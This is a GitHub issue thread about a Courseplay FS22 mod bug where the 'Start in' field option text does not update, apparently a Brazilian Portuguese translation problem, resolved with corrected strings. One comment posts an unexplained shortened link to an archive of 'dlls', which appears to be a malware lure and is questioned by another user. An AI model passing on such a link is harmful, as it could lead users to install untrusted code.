### ISSUE TITLE
Error that no one has talked about until now[BUG_SP]

### ISSUE THREAD

**Issue by erksartori** [Courseplay/Courseplay_FS22#3439]
**READ FIRST**
https://github.com/Courseplay/Courseplay_FS22/wiki

**Steps to reproduce**

Create field starting from the center

**Actual behavior**

When you create the field and want it to start in the center, you click on the option but it doesn't change the description, there's no click noise but it changes correctly. The only thing is that the change isn't shown.

**Expected behavior**

The change in the "Start in" field would be shown.

**Screenshots**

**Courseplay version**
Version used: 

**Actual behavior**
A clear and concise description of what happen.

**Expected behavior**

**Screenshots**

![image](https://github.com/user-attachments/assets/0186d63d-4282-4c06-b1f3-88602ccf1b73)

**Courseplay version**
Version used:  7.4.2.0

**Log**
Please attach a log with all debug channels active.
For help with the debug channels,
please check out the readme at the github front page.

[log.txt](https://github.com/user-attachments/files/17057592/log.txt)

**Map**
Map played on.

Any map, problem comes from previous versions of 7.1.4.0 onwards

**Vehicles/ implements involved**
Which vehicle or implement?
Mod yes/no ?

Anyone

**Relevant script mods**
Mods like Autodrive or VCA and so on.

TKS

**Comment by websquadpro** [comment]
maybe this will help
https://bit.ly/3XQLHlH
I put the necessary dlls in the archive

**Comment by Roby1164** [comment]
> maybe this will help https://bit.ly/3XQLHlH I put the necessary dlls in the archive

Who is this and what is this file???

**Comment by Tensuko** [comment]
ofc it works.
the question is what you expect....

**Comment by Tensuko** [comment]
![grafik](https://github.com/user-attachments/assets/b2bf9493-3cad-4124-bcad-f2b57fe348a1)
![grafik](https://github.com/user-attachments/assets/c0c7d564-4f9f-4060-98cd-8eaa0631e374)

**Comment by erksartori** [comment]
So it doesn't work here, it doesn't appear, it could be something related to the translation to Brazilian Portuguese, because here it doesn't change anything. I only know it changed when I send it to generate. Then I see if it's in the center or at the top.

**Comment by Tensuko** [comment]
![grafik](https://github.com/user-attachments/assets/232cba3f-1c3f-4280-8166-5b88fe4e6fc2)

**Comment by Tensuko** [comment]
What would be the correct text? for start on:
- center
- headland
- ?

**Comment by erksartori** [comment]
I made a video for you to see: 

https://youtu.be/5bweJclWsBQ

**Comment by erksartori** [comment]
What would be the correct text? for start on:

center    = Centro
headland = Cabeceira

**Comment by erksartori** [comment]
show, thank you very much
